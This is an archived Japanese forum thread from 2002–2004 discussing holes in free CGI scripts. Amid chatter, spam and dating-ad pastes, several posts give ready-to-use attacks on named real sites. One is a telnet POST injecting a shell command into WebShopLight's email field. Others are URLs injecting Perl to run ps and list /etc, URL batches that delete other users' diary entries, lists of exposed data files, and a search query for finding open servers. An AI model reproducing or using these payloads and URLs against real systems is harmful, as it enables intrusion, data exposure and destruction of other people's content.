方々にお礼申し上げます。またお会いできる日が来る事を願っています。


132 :(´∀` ) ◆mona.SiQ :02/07/13 17:26
ttp://www2.inforyoma.or.jp/~terra/
あぼーん

133 :名無しさん@お腹いっぱい。:02/07/13 17:45
>>129
> No reproduction or republication without written

No reproduction or republication without written permission

のことかな。どこかからコピペしてミスった思われ(w

134 :126:02/07/13 18:18
正しくは

my $pid = open(FOO, "|-");
die $! unless (defined($pid));
unless ($pid) {
exec ... || die $!;
}
やね。

135 :名無しさん@お腹いっぱい。:02/07/13 18:24
>>131
> 私どもの意識改革を含め二度とこのような事の無いよう出直したいと思います。
私どもってなんだろね? terraって複数人で構成されてた?

136 :名無しさん@お腹いっぱい。:02/07/13 18:55
>>135

どこの国の方ですか?


ども【共】(接尾)
(1)名詞に付いて、そのものが二つ以上であることを表す。
 「者―進め」「犬―」「こまごましたこと―」
(2)一人称の代名詞に付いて、謙譲の意を添える。
 「わたくし―の手違いでした」「てまえ―の店では扱っておりません」
(3)人を表す名詞に付いて、相手への呼び掛けに用いる。


137 :名無しさん@お腹いっぱい。:02/07/13 18:56
>>136
勉強になりますた

138 :              :02/07/17 00:00
あげてみる

139 :名無しさん@お腹いっぱい。:02/07/17 02:48
■危険■PCから個人情報を盗むデートクラブ■危険■

悪質な出会い系クラブを発見したので日本全国に告発します。
■■■ Club-Cosmo ■■■
コスモライフとホテルニューオータニが提案する新しいライフスタイル
http://www.trust-system.co.jp/club-cosmo/index.htm

以下のソフトはスパイウエアです。この出会い系クラブの目的は
PCに記録されている会員の個人的な嗜好を勝手に抜き取って、別
の商売に転用することである疑いが濃厚です。

a)会員専用のコミュニケーションソフトウェア
http://www.trust-system.co.jp/club-cosmo/download_files/cosmo_viewer.exe

b)USBキー認証ツール
http://www.trust-system.co.jp/club-cosmo/download_files/RainbowSSD5.39.2.exe


これらのプログラムを開発したのはトラストシステムという企業です。
地図の模型を作っているようですが、実績を見ると何でも屋のようです。
http://www.trust-system.co.jp/
この企業の求人案内
http://www.trust-system.co.jp/recruite.htm
問い合わせ
http://www.trust-system.co.jp/toiawase.htm

ソフトを解析すれば私の告発が的を得ていることが証明できるでしょう。

140 :名無しさん@お腹いっぱい。:02/07/22 19:27
http://www.asagao.sakura.ne.jp/~ksm/strange/bbs.cgi
このサイトがまるみえ。
宣伝ぢゃないよ、パーミッションの設定ミス。

141 :名無しさん@お腹いっぱい。:02/08/01 13:33
↑ブラクラチェッカのリファばっか(wo-nまんだむ;
http://www.asagao.sakura.ne.jp/~ksm/strange/bbs.txt

142 :名無しさん@お腹いっぱい。:02/08/18 10:42
お盆休みも終わりなので確認コード。 対応法は>>134

% telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
POST /WebShopLight/webshoplight.cgi HTTP/1.0
Attack-Command: eval sh -c "ls -l >test"
Content-Length: 238

pass=&name=name&email=xxx@yyy.zzz$($HTTP_ATTACK_COMMAND)&tel=0000-0000-0000&fax=&ubin=100-0001&jyusyo=%3F%3F%3F&settle=%91%E3%8B%E0%88%F8%8A%B7%97X%95%D6%96%94%82%C
D%91%EE%94z%95%D6&comment=%81@&button=%8Am%94F+OK+%92%8D%95%B6%82%B7%82%E9


143 :名無しさん@お腹いっぱい。:02/08/18 10:55


144 :707:02/08/19 12:45
http://www.cosmic-jap.com/HP/koba/

145 :707:02/08/19 12:49
yahooとかでWS_FTP.LOGで調べてみて。いっぱいだ

146 :名無しさん@お腹いっぱい。:02/08/19 23:11
>>707
セキュ穴さんがいるんじゃねーのか。
Server: Apache/1.3.20

147 :名無しさん@お腹いっぱい。:02/08/19 23:28
>>146
http://www.google.com/search?num=50&hl=ja&inlang=ja&ie=Shift_JIS&q=Server+Apache+1.3.20+%22Index+of%22+site%3Aco.jp&lr=lang_ja


148 :名無しさん@お腹いっぱい。:02/08/19 23:51
うんこぷりぷり〜

149 :146:02/08/20 00:25
>>147
ワラタ。

150 :名無しさん@お腹いっぱい。:02/08/20 19:45
>>146
この人の鯖、穴あるよ。
アプグレしたほうがええよ。
CERT勧告確認しようね。

151 :名無しさん@お腹いっぱい。:02/10/07 06:42
意味無くアゲ

152 :名無しさん@お腹いっぱい。:02/10/07 07:58
>>151 あげ荒らし氏ね

153 :名無しさん@お腹いっぱい。:02/10/07 18:55
おもしろいね
http://www.manabitai.com/cgi-bin/edperl/edperl02/edperl02_3/edperl02_31.cgi?hasy01="one",join("",eval("`ps%20xau`"))

154 :名無しさん@お腹いっぱい。:02/10/07 23:49
http://ch2.s2.xrea.com/source/035.txt

http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=29
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=29&del29=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=resist&date=xxx&subject=xxx&comment=xxx


155 :名無しさん@お腹いっぱい。:02/10/07 23:56
http://ch2.s2.xrea.com/source/035.txt
http://www.google.co.jp/search?q=%E2%98%86Monoceros+ver+0.10+by+kz+island&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

156 :後はお好きなように:02/10/09 00:30
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=0&del0=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=1&del1=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=2&del2=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=3&del3=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=4&del4=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=5&del5=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=6&del6=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=7&del7=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=8&del8=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=9&del9=on
http://diary2.milktea.to/monoceros.cgi?room=washio&action=edit&edit=10&del10=on


157 :名無しさん@お腹いっぱい。:02/10/09 04:17
http://www.manabitai.com/cgi-bin/edperl/edperl02/edperl02_3/edperl02_31.cgi?hasy01=%29%3B%0D%0Aprint%20%22content-type%3Atext/html%3B%5Cn%5Cn%22%3B%0D%0Aprint%20%60ls%20-la%20/etc%60%3B%0D%0A__DATA__%0D%0A

158 :名無しさん@お腹いっぱい。:02/10/10 11:05
>>134
元のMLではがいしゅつだけどね。
http://memo.st.ryukoku.ac.jp/archive/200206.month/4258.html
見た目の短さでわざわざ糞コードに改悪してくださる宮川様には
開いた口がふさがりませぬ。
そういう発想こそがセキュリティホールの元だというに。

159 :名無しさん@お腹いっぱい。:02/10/10 23:08
http://www.mintbox.net/diary/003y/003y.cgi?action=edit&edit=12
http://www.mintbox.net/diary/003y/003y.cgi?action=edit&edit=11
http://www.mintbox.net/diary/003y/003y.cgi?action=edit&edit=10
http://www.mintbox.net/diary/003y/003y.cgi?action=edit&edit=9
http://www.mintbox.net/diary/003y/003y.cgi?action=edit&edit=8

160 :名無しさん@お腹いっぱい。:02/10/17 12:43
http://cgi.www5a.biglobe.ne.jp/~ninosuke/cgi-bin/monoceros.cgi?action=edit&edit=52&del52=on
http://cgi.www5a.biglobe.ne.jp/~ninosuke/cgi-bin/monoceros.cgi?&date=-&subject=-&comment=-

161 :名無しさん@お腹いっぱい。:02/11/03 21:20
会社からご苦労様です
ttp://may.sakura.ne.jp/~musume8/mailme/member.cgi?sex=0
 身長170体重80でがっちりタイプです。仕事柄出張がおおいので地方の方でも気軽に返
 事下さい。お互いの生活を脅かすことなく、ある意味割り切ってお付き合いできる方を
 希望します。年齢は20〜40ぐらいまででお願いします。交際費は全て負担しますので気
 軽に返事下さい。
     既婚者で家庭は壊したくないけどちょっとドキドキしたいと
         愛人になってくれる若くて素敵な方を探しています!
ttp://www.suisen.sakura.ne.jp/~penweb/Hindex/mailme/member.cgi?sex=0
 僕はお金持ちじゃないけどきっとこの掲示板に載せてる中では顔とお洒落は上位に食い
 込めると思います。Hは他の人のを知らないので何とも言えませんが、舌技が得意でそ
 れだけでイカせる自信はあります。そんな僕とお会いできる女性を募集してます。よろ
 しくね!
      Mっ気のある女の子をよろこばせてあげたいな。
ttp://www.kensaku-net.com/deai/merutomo/hiroba/tyu/member.cgi?sex=0
 彼女います。旦那や彼氏には話せないちょこ話しましょう。仕事柄日中でも、返事返せ
 ます。

162 :名無しさん@お腹いっぱい。:02/11/07 07:36
terraってもう完全にCGIの配布中止してるの?
Webprotect.cgiが欲しいんだけど…誰か持ってる?

163 :名無しさん@お腹いっぱい。:03/01/13 14:11
http://tanbob.hp.infoseek.co.jp/cgi-bin/file.dat
http://ryotakag.hp.infoseek.co.jp/cgi-bin/file.dat
http://chu-.hp.infoseek.co.jp/cgi-bin/file.dat
http://www.chuchan.com/pony/cgi-bin/file.dat
http://www9.wind.ne.jp/wordsmen/cgi-bin/file.dat
http://www.teleport-sankuni.co.jp/~michiura/img/file.dat
http://greencd.hp.infoseek.co.jp/cgi-bin/file.dat
http://www.obt3.net/gkeij/cgi-bin/file.dat
http://211.10.20.173/~rakuen/cgi-bin/imgbbs/file.dat
http://210.188.226.49/~prm/cgi/pbgv/imgbord/file.dat


164 :山崎渉:03/01/15 15:41
(^^)

165 :山崎渉:03/03/13 17:32
(^^)

166 :名無しさん@お腹いっぱい。:03/04/14 21:26
あげ

167 :名無しさん@お腹いっぱい。:03/04/14 21:32
>>166 なぜ?馬鹿?

168 :名無しさん@お腹いっぱい。:03/04/15 11:21
    γ⌒⌒ヽ
  ヾ) ノノノノノハ)
   ヽノソ ‘ 。‘ノ  <もろ見えだわ〜
    丶_●‐●
      〉  , l〉
     (~~▼~|)
      > ) ノ
     (_/ヽ_)

http://www.media-0.com/www/dvd01/index1.htm

169 :山崎渉:03/04/17 12:04
(^^)

170 :山崎渉:03/04/20 06:21
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

171 :名無しさん@お腹いっぱい。:03/04/30 03:16
uppp

172 :名無しさん@お腹いっぱい。:03/05/18 00:31
気になることあり。

そういえば、エクスプローラーではCGI中のdatは落とせないよね。
他に落とせる方法ってあったっけ?
自分の設置したCGIのデータ落としたいけど、
自分のホームページのアップロードのパス忘れちゃいました…

173 :名無しさん@お腹いっぱい。:03/05/18 04:14
>>172
言ってる意味わかんね

174 :名無しさん@お腹いっぱい。:03/05/18 04:19
>>162
http://www.tryhp.net/

175 :オナニスト ◆A4R0lAe0RQ :03/05/19 11:43
>>172
(゜Д゜) ハア??
初心者ですか?
釣りですか?
以後放置で

176 :山崎渉:03/05/22 02:01
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

177 :山崎渉:03/05/28 17:14
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

178 :山崎 渉:03/07/15 11:15

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

179 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:12
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

180 :名無しさん@お腹いっぱい。:03/08/08 17:33
terra タン最近どうしてるかなーと見に行ってみた。
http://www.tryhp.net/sendmail.htm

>>109のコードがそっくりそのまま流用されていた(激藁
それじゃ駄目だろってば。

181 :山崎 渉:03/08/15 23:09
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

182 :名無しさん@お腹いっぱい。:03/12/03 05:23
保守していい?

183 :名無しさん@お腹いっぱい。:04/02/24 21:10
>>147
なんちゅうか。。。

184 :名無しさん@お腹いっぱい。:04/05/07 18:50
>>17
いや、よくあることだと思うが。

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)